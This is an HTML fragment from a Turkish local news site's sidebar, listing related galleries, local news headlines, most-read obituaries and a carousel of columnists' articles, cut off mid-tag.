  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/Kentpark+AVM" title="Kentpark AVM haberleri">Kentpark AVM</a><a href="http://www.elbistaninsesi.com/haberleri/Ramazan+ay%C4%B1n%C4%B1+kampanyalarla+kar%C5%9F%C4%B1l%C4%B1yor" title="Ramazan Ayını Kampanyalarla Karşılıyor haberleri">Ramazan Ayını Kampanyalarla Karşılıyor</a></div>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/ambulansla-otomobil-carpisti-olu-ve-yaralilar-var-h69783.html"  title="Ambulansla otomobil çarpıştı: ölü ve yaralılar var">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/ambulansla_otomobil_carpisti_olu_ve_yaralilar_var_h69783_06456.jpg" alt="Ambulansla otomobil çarpıştı: ölü ve yaralılar var" />
        <span>Ambulansla otomobil çarpıştı: ölü ve yaralılar...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/otomobile-motosiklet-carpisti-1-yarali-h69782.html"  title="Otomobile motosiklet çarpıştı: 1 yaralı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/otomobile_motosiklet_carpisti_1_yarali_h69782_5e36d.jpg" alt="Otomobile motosiklet çarpıştı: 1 yaralı" />
        <span>Otomobile motosiklet çarpıştı: 1 yaralı</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/polis-haftasi-kutlamalari-basladi-2-h69781.html"  title="Polis Haftası kutlamaları başladı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/polis_haftasi_kutlamalari_basladi_h69781_241b1.JPG" alt="Polis Haftası kutlamaları başladı" />
        <span>Polis Haftası kutlamaları başladı</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/baskan-zor-elbistanda-ziyaretlerde-bulundu-h69780.html"  title="Başkan Zor, Elbistan’da ziyaretlerde bulundu">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/baskan_zor_elbistanda_ziyaretlerde_bulundu_h69780_553d8.jpg" alt="Başkan Zor, Elbistan’da ziyaretlerde bulundu" />
        <span>Başkan Zor, Elbistan’da ziyaretlerde bulundu</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/19-mahalledeki-63-tasinmaz-9-milyon-tl-toplam-bedelle-satisa-cikarildi-h69779.html"  title="19 mahalledeki 63 taşınmaz 9 milyon TL toplam bedelle satışa çıkarıldı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/19_mahalledeki_63_tasinmaz_9_milyon_tl_toplam_bedelle_satisa_cikarildi_h69779_3491c.jpg" alt="19 mahalledeki 63 taşınmaz 9 milyon TL toplam bedelle satışa çıkarıldı" />
        <span>19 mahalledeki 63 taşınmaz 9 milyon TL toplam bedelle...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/ketem-kanserde-erken-teshisin-onemine-dikkat-cekti-h69778.html"  title="KETEM, kanserde erken teşhisin önemine dikkat çekti">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/ketem_kanserde_erken_teshisin_onemine_dikkat_cekti_h69778_6fd8c.jpg" alt="KETEM, kanserde erken teşhisin önemine dikkat çekti" />
        <span>KETEM, kanserde erken teşhisin önemine dikkat çekti</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/akbayir-halkindan-baskan-tirasa-tesekkur-h69776.html"  title="Akbayır halkından Başkan Tıraş’a teşekkür">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/akbayir_halkindan_baskan_tirasa_tesekkur_h69776_eed0f.jpg" alt="Akbayır halkından Başkan Tıraş’a teşekkür" />
        <span>Akbayır halkından Başkan Tıraş’a teşekkür</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/ziraat-odasindan-ciftcilere-12-bin-kumes-hayvani-h69775.html"  title="Ziraat Odası’ndan çiftçilere 12 bin kümes hayvanı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/ziraat_odasindan_ciftcilere_12_bin_kumes_hayvani_h69775_27c63.JPG" alt="Ziraat Odası’ndan çiftçilere 12 bin kümes hayvanı" />
        <span>Ziraat Odası’ndan çiftçilere 12 bin kümes hayvanı</span>
      </a>
    </div>
      </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes">41.1B</a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">99</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/16-yasindaki-genc-kiza-cinsel-istismar-iddiasi-13-gozalti-h69697.html" title="16 yaşındaki genç kıza cinsel istismar..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/16_yasindaki_genc_kiza_cinsel_istismar_iddiasi_13_gozalti_h69697_90c90.jpg" alt="16 yaşındaki genç kıza cinsel istismar..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/16-yasindaki-genc-kiza-cinsel-istismar-iddiasi-13-gozalti-h69697.html" title="" ><span class="en-hit">1.</span> <strong>16 yaşındaki genç kıza cinsel istismar...</strong> <span class="en-spot en-hidden">Elbistan&#039;da 16 yaşındaki genç kıza şantajla 2 yıldır cinsel...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ismet-zedeli-h69710.html" title="İsmet Zedeli" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/ismet_zedeli_h69710_3ff39.jpg" alt="İsmet Zedeli" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ismet-zedeli-h69710.html" title="" ><span class="en-hit">2.</span> <strong>İsmet Zedeli</strong> <span class="en-spot en-hidden"></span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-uzman-cavus-kalbine-yenildi-h69615.html" title="Elbistanlı uzman çavuş kalbine yenildi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/elbistanli_uzman_cavus_kalbine_yenildi_h69615_b7476.jpg" alt="Elbistanlı uzman çavuş kalbine yenildi" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-uzman-cavus-kalbine-yenildi-h69615.html" title="" ><span class="en-hit">3.</span> <strong>Elbistanlı uzman çavuş kalbine yenildi</strong> <span class="en-spot en-hidden">Şanlıurfa’da görev yapan Elbistanlı uzman çavuş İdris Öztürk...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-pazar-gunu-sokaga-cikmak-yasak-h69689.html" title="Elbistanda Pazar günü sokağa..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/elbistanda_pazar_gunu_sokaga_cikmak_yasak_h69689_0f403.jpg" alt="Elbistanda Pazar günü sokağa..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-pazar-gunu-sokaga-cikmak-yasak-h69689.html" title="" ><span class="en-hit">4.</span> <strong>Elbistan’da Pazar günü sokağa...</strong> <span class="en-spot en-hidden">İçişleri Bakanlığı&#039;nın yayımladığı genelgeye göre, ‘yüksek...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/agir-yaralanan-isci-12-gunluk-yasam-mucadelesini-kaybetti-h69591.html" title="Ağır yaralanan işçi 12 günlük..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/agir_yaralanan_isci_12_gunluk_yasam_mucadelesini_kaybetti_h69591_d10bd.jpg" alt="Ağır yaralanan işçi 12 günlük..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/agir-yaralanan-isci-12-gunluk-yasam-mucadelesini-kaybetti-h69591.html" title="" ><span class="en-hit">5.</span> <strong>Ağır yaralanan işçi 12 günlük...</strong> <span class="en-spot en-hidden">A Termik Santrali’nde sıcak su hattındaki arıza sonucu buhar ve sıcak...</span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/ismet-zedeli-h69710.html" title="İsmet Zedeli" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/ismet_zedeli_h69710_3ff39.jpg" alt="İsmet Zedeli"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ismet-zedeli-h69710.html" title="" ><span class="en-hit">1.</span> <strong>İsmet Zedeli</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ibrahim-gok-51-yasinda-h69603.html" title="İbrahim Gök 51 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/ibrahim_gok_51_yasinda_h69603_0acf3.jpg" alt="İbrahim Gök 51 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ibrahim-gok-51-yasinda-h69603.html" title="" ><span class="en-hit">2.</span> <strong>İbrahim Gök 51 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/mesut-albay-73-yasinda-h69618.html" title="Mesut Albay 73 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/mesut_albay_73_yasinda_h69618_a5f61.jpg" alt="Mesut Albay 73 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/mesut-albay-73-yasinda-h69618.html" title="" ><span class="en-hit">3.</span> <strong>Mesut Albay 73 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/fatih-kral-h69451.html" title="Fatih Kral" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/fatih_kral_h69451_2810e.jpg" alt="Fatih Kral"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/fatih-kral-h69451.html" title="" ><span class="en-hit">4.</span> <strong>Fatih Kral</strong> <span class="en-spot en-hidden">Fatih Kral</span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/serif-uzman-64-yasinda-h69679.html" title="Şerif Uzman 64 Yaşında ;" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/serif_uzman_64_yasinda_h69679_d0972.jpg" alt="Şerif Uzman 64 Yaşında ;"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/serif-uzman-64-yasinda-h69679.html" title="" ><span class="en-hit">5.</span> <strong>Şerif Uzman 64 Yaşında ;</strong> <span class="en-spot en-hidden"></span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="http://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/soz-ustasi-sair-ali-akbas-a-ithaf-makale,6157.html" title="Söz Ustası -Şair Ali Akbaş&#039;a ithaf-" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="http://www.elbistaninsesi.com/soz-ustasi-sair-ali-akbas-a-ithaf-makale,6157.html" title="Söz Ustası -Şair Ali Akbaş&#039;a ithaf-" >Söz Ustası -Şair Ali Akbaş&#039;a ithaf-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hanslar-ve-hasanlar-makale,6156.html" title="HANSLAR VE HASANLAR" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="http://www.elbistaninsesi.com/hanslar-ve-hasanlar-makale,6156.html" title="HANSLAR VE HASANLAR" >HANSLAR VE HASANLAR</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/bir-sahih-propaganda-makale,6155.html" title="Bir Sahih Pro­pa­gan­da" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/IMG_20210216_033715.jpg" alt="Metehan Çağrı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/92/metehan-cagri" title="Metehan Çağrı">Metehan Çağrı</a></h4>
              <a href="http://www.elbistaninsesi.com/bir-sahih-propaganda-makale,6155.html" title="Bir Sahih Pro­pa­gan­da" >Bir Sahih Pro­pa­gan­da</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/sevdaliyim-makale,6154.html" title="SEVDALIYIM" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ahmet-bulut_1.jpg" alt="Ahmet Bulut">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/11/ahmet-bulut" title="Ahmet Bulut">Ahmet Bulut</a></h4>
              <a href="http://www.elbistaninsesi.com/sevdaliyim-makale,6154.html" title="SEVDALIYIM" >SEVDALIYIM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/zulum-bizdense-ben-bizden-degilim-makale,6153.html" title="ZULÜM BİZDENSE BEN BİZDEN DEĞİLİM" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="http://www.elbistaninsesi.com/zulum-bizdense-ben-bizden-degilim-makale,6153.html" title="ZULÜM BİZDENSE BEN BİZDEN DEĞİLİM" >ZULÜM BİZDENSE BEN BİZDEN DEĞİLİM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/elbistanda-yetisen-unlu-bir-vali-1878-1948-makale,6152.html" title="Elbistan’da yetişen ünlü bir vali (1878-1948)" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/1.jpg" alt="Arif  Bilgin - Tarih">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/1/arif-bilgin-tarih" title="Arif  Bilgin - Tarih">Arif  Bilgin - Tarih</a></h4>
              <a href="http://www.elbistaninsesi.com/elbistanda-yetisen-unlu-bir-vali-1878-1948-makale,6152.html" title="Elbistan’da yetişen ünlü bir vali (1878-1948)" >Elbistan’da yetişen ünlü bir vali (1878-1948)</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/stem-egitimi-makale,6151.html" title="STEM EĞİTİMİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="http://www.elbistaninsesi.com/stem-egitimi-makale,6151.html" title="STEM EĞİTİMİ" >STEM EĞİTİMİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/seni-bulur-makale,6149.html" title="SENİ BULUR" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="http://www.elbistaninsesi.com/seni-bulur-makale,6149.html" title="SENİ BULUR" >SENİ BULUR</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/kazma-kurek-yaktiriyor-makale,6147.html" title="KAZMA KÜREK YAK­TI­RI­YOR" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Nadir-Adbay_499_1.jpg" alt="Mehmet Ayaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/6/mehmet-ayaz" title="Mehmet Ayaz">Mehmet Ayaz</a></h4>
              <a href="http://www.elbistaninsesi.com/kazma-kurek-yaktiriyor-makale,6147.html" title="KAZMA KÜREK YAK­TI­RI­YOR" >KAZMA KÜREK YAK­TI­RI­YOR</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/ilk-insanlar-makale,6146.html" title="İLK İNSAN­LAR " >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="http://www.elbistaninsesi.com/ilk-insanlar-makale,6146.html" title="İLK İNSAN­LAR " >İLK İNSAN­LAR </a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/elif-makale,6145.html" title="ELİF" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Yemliha-Gurlek_688_1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
              <a href="http://www.elbistaninsesi.com/elif-makale,6145.html" title="ELİF" >ELİF</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/adam-misin-dem-misin-yoksa-makale,6142.html" title="Adam mısın? Âdem misin? Yoksa..." >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mikail_Yahin_foto.jpeg" alt="Mikail Şahin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/65/mikail-sahin" title="Mikail Şahin">Mikail Şahin</a></h4>
              <a href="http://www.elbistaninsesi.com/adam-misin-dem-misin-yoksa-makale,6142.html" title="Adam mısın? Âdem misin? Yoksa..." >Adam mısın? Âdem misin? Yoksa...</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/zamanimizin-evliligi-makale,6139.html" title="Zamanımızın evliliği" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Yair_arYkan.jpg" alt="Şahin ARIKAN">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/78/sahin-arikan" title="Şahin ARIKAN">Şahin ARIKAN</a></h4>
              <a href="http://www.elbistaninsesi.com/zamanimizin-evliligi-makale,6139.html" title="Zamanımızın evliliği" >Zamanımızın evliliği</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hayattan-aldigim-bazi-dersler-makale,6138.html" title="HA­YAT­TAN AL­DI­GIM BAZI DERS­LER " >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/11.jpg" alt="Nusret Yılmaz Külekçi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/74/nusret-yilmaz-kulekci" title="Nusret Yılmaz Külekçi">Nusret Yılmaz Külekçi</a></h4>
              <a href="http://www.elbistaninsesi.com/hayattan-aldigim-bazi-dersler-makale,6138.html" title="HA­YAT­TAN AL­DI­GIM BAZI DERS­LER " >HA­YAT­TAN AL­DI­GIM BAZI DERS­LER </a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/igdeye-gelin-makale,6135.html" title="İGDEYE GELİN" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Ramazan-Pamuk_910_1.jpg" alt="Ramazan Pamuk">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/23/ramazan-pamuk" title="Ramazan Pamuk">Ramazan Pamuk</a></h4>
              <a href="http://www.elbistaninsesi.com/igdeye-gelin-makale,6135.html" title="İGDEYE GELİN" >İGDEYE GELİN</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/yeni-anayasa-hazirlama-kurulu-sayin-baskan-ve-sayin-uyesi-beyefendilerehalkimiz-adina-acik-mektup-makale,6133.html" title="Yeni Ana­ya­sa Ha­zır­la­ma Ku­ru­lu Sayın Baş­kan ve Sayın Üyesi Be­ye­fen­di­le­re, Hal­kı­mız adına açık mek­tup" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gocer_1.jpg" alt="Mehmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/4/mehmet-gocer" title="Mehmet Göçer">Mehmet Göçer</a></h4>
              <a href="http://www.elbistaninsesi.com/yeni-anayasa-hazirlama-kurulu-sayin-baskan-ve-sayin-uyesi-beyefendilerehalkimiz-adina-acik-mektup-makale,6133.html" title="Yeni Ana­ya­sa Ha­zır­la­ma Ku­ru­lu Sayın Baş­kan ve Sayın Üyesi Be­ye­fen­di­le­re, Hal­kı­mız adına açık mek­tup" >Yeni Ana­ya­sa Ha­zır­la­ma Ku­ru­lu Sayın Baş­kan ve Sayın Üyesi Be­ye­fen­di­le­re, Hal­kı­mız adına açık mek­tup</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/kat-dert-makale,6130.html" title="Kat&#039;î Dert " >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="http://www.elbistaninsesi.com/kat-dert-makale,6130.html" title="Kat&#039;î Dert " >Kat&#039;î Dert </a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/aziz-dost-makale,6129.html" title="AZİZ DOST" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Feyzi-Tasolar_536_1.jpg" alt="Feyzi Taşolar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/24/feyzi-tasolar" title="Feyzi Taşolar">Feyzi Taşolar</a></h4>
              <a href="http://www.elbistaninsesi.com/aziz-dost-makale,6129.html" title="AZİZ DOST" >AZİZ DOST</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/asimin-nesli-makale,6121.html" title="   ASIM’IN NESLİ!..." >
            <div class="hs-yazar-resim pull-right">
